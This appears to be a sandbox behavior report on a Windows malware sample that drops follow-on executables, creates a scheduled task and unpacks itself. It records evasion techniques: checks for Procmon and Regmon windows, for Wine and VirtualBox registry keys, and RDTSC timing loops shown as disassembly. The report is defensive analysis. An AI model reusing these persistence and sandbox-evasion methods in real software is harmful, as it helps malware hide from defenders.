Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Fp80Ocyhqm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Fp80Ocyhqm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Fp80Ocyhqm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Fp80Ocyhqm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Fp80Ocyhqm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Fp80Ocyhqm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Fp80Ocyhqm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Fp80Ocyhqm.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: Fp80Ocyhqm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Fp80Ocyhqm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Fp80Ocyhqm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Fp80Ocyhqm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Fp80Ocyhqm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Unpacked PE file: 5.2.cubrodriver.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW;
Source: C:\ProgramData\giab\fvvb.exe	Unpacked PE file: 6.2.fvvb.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: cubrodriver.exe.1.dr	Static PE information: real checksum: 0x1ac12a should be: 0x1b2325
Source: fvvb.exe.5.dr	Static PE information: real checksum: 0x1ac12a should be: 0x1b2325
Source: Fp80Ocyhqm.exe	Static PE information: real checksum: 0x0 should be: 0x73d64
Source: cubrodriver[1].exe.1.dr	Static PE information: real checksum: 0x1ac12a should be: 0x1b2325
Source: Gxtuum.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x73d64

Source: cubrodriver[1].exe.1.dr	Static PE information: section name:
Source: cubrodriver[1].exe.1.dr	Static PE information: section name: .idata
Source: cubrodriver[1].exe.1.dr	Static PE information: section name:
Source: cubrodriver[1].exe.1.dr	Static PE information: section name: yuxfscdw
Source: cubrodriver[1].exe.1.dr	Static PE information: section name: oiahzgmh
Source: cubrodriver[1].exe.1.dr	Static PE information: section name: .taggant
Source: cubrodriver.exe.1.dr	Static PE information: section name:
Source: cubrodriver.exe.1.dr	Static PE information: section name: .idata
Source: cubrodriver.exe.1.dr	Static PE information: section name:
Source: cubrodriver.exe.1.dr	Static PE information: section name: yuxfscdw
Source: cubrodriver.exe.1.dr	Static PE information: section name: oiahzgmh
Source: cubrodriver.exe.1.dr	Static PE information: section name: .taggant
Source: fvvb.exe.5.dr	Static PE information: section name:
Source: fvvb.exe.5.dr	Static PE information: section name: .idata
Source: fvvb.exe.5.dr	Static PE information: section name:
Source: fvvb.exe.5.dr	Static PE information: section name: yuxfscdw
Source: fvvb.exe.5.dr	Static PE information: section name: oiahzgmh
Source: fvvb.exe.5.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0008A063 push ecx; ret	0_2_0008A076
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_000772EF pushad ; iretd	0_2_000772F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0043A063 push ecx; ret	1_2_0043A076
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_004272EF pushad ; iretd	1_2_004272F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0043A063 push ecx; ret	3_2_0043A076
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_004272EF pushad ; iretd	3_2_004272F0

Source: cubrodriver[1].exe.1.dr	Static PE information: section name: entropy: 7.799208910449233
Source: cubrodriver[1].exe.1.dr	Static PE information: section name: yuxfscdw entropy: 7.952071105223017
Source: cubrodriver.exe.1.dr	Static PE information: section name: entropy: 7.799208910449233
Source: cubrodriver.exe.1.dr	Static PE information: section name: yuxfscdw entropy: 7.952071105223017
Source: fvvb.exe.5.dr	Static PE information: section name: entropy: 7.799208910449233
Source: fvvb.exe.5.dr	Static PE information: section name: yuxfscdw entropy: 7.952071105223017

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	File created: C:\ProgramData\giab\fvvb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cubrodriver[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	File created: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	File created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe

File created: C:\ProgramData\giab\fvvb.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

File created: C:\Windows\Tasks\Gxtuum.job

Jump to behavior

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_0008918F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0008918F

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 40BA21 second address: 40BA3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 587B55 second address: 587B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F01B4D45ED6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 587D1B second address: 587D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 587E80 second address: 587E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 587E85 second address: 587EAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F01B44E8CA9h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 587EAE second address: 587EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 587EB6 second address: 587EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 588001 second address: 588025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F01B4D45EE8h 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 588196 second address: 58819E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58819E second address: 5881BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B4D45EE2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5881BD second address: 5881C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5881C1 second address: 5881FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F01B4D45EE5h 0x00000012 jmp 00007F01B4D45EE4h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5883A8 second address: 5883AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 589F51 second address: 589F83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F01B4D45EDEh 0x00000008 jmp 00007F01B4D45EE0h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 jc 00007F01B4D45EDCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58A03C second address: 58A088 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xor dword ptr [esp], 343CC600h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F01B44E8C98h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 movzx ecx, di 0x0000002b lea ebx, dword ptr [ebp+12451E5Bh] 0x00000031 and edx, 7DF1E532h 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d jns 00007F01B44E8C96h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58A2AD second address: 58A2B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58A2B2 second address: 58A2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58A2C0 second address: 58A304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F01B4D45EDCh 0x0000000a popad 0x0000000b nop 0x0000000c xor cx, FE9Bh 0x00000011 push 00000000h 0x00000013 and si, FC77h 0x00000018 call 00007F01B4D45ED9h 0x0000001d jmp 00007F01B4D45EE1h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F01B4D45ED8h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58A304 second address: 58A309 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58A309 second address: 58A344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jl 00007F01B4D45EECh 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F01B4D45EDFh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58A344 second address: 58A348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58A348 second address: 58A381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F01B4D45ED8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F01B4D45EE8h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e jc 00007F01B4D45ED6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
